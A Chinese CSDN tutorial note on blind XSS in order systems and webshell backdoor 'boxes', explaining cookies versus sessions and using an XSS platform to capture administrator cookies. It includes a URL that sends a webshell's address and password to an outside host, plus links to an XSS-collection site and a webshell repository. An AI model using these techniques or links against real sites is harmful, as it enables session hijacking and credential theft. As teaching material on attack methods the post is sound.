第26天-WEB漏洞-XSS跨站之订单及Shell箱子反杀记

本文探讨了XSS(跨站脚本)漏洞常见存在位置,如留言板、订单系统和反馈系统,并解释了cookie与session的区别。通过案例展示了如何利用XSS获取用户信息,提到了webShell和后门的概念。同时,介绍了利用工具如Postman进行HTTP数据包提交,并提供了相关资源链接。强调了session存储在服务器上的特性,指出XSS平台无法捕获PHPSESSION信息。
摘要由CSDN通过智能技术生成

思维导图

在这里插入图片描述

xss漏洞存在的地方

留言板 评论区 订单系统 意见反馈等

#cookie session
用户凭据:通过凭据可以判断对方身份信息
cookie 存储本地 存活时间较长 小中型
session 会话 存储服务器 存活时间较短 大型

演示案例:

某营销订单系统 XSS 盲打_平台

前端订单界面

在这里插入图片描述

后端管理界面

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

演示这个案例的意图是:了解在什么位置利用xss,从而获取有用信息!

使用xss平台/工具

自己编写代码接收

某 Shell 箱子系统 XSS 盲打_工具

跨站漏洞可以应用在很多方面

webShell 箱子(后门中的后门) 一句话shell ,脚本后门(大马),脚本控制网站,别有用心的人会在脚本中再写上后面,你入侵一个网站之后,你用他的后门脚本对网站进行一个控制,那么入侵网站的信息,你的后门地址,后门密码,会发送到一个地方,俗称 箱子、信封。

在这里插入图片描述

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XiGfLgiI-1646998304883)(image/QQ截图20220311180354.png)]

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

把你的后门地址和密码传回…

http://www.mumasp.com/xz/sx.asp?u=39.96.44.170/x.asp&p=mumaasp.com

其他参考应用案例-后台权限维持

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

工具 Http/s 数据包提交 Postman 使用

postman软件

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

因为采用的是session验证, 那么xss平台是接收不到PHPSESSION的,

session 是存储在网站服务器的。

涉及资源:

http://xss.fbisb.com/
https://github.com/tennc/webshell
https://www.postman.com/downloads/
https://pan.baidu.com/s/1lIUZvEVXs1du-Bmkt7-abA 提取码:xiao
https://pan.baidu.com/s/13H4N1VTBVwd3t8YWpECBFw 提取码:
xiao

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值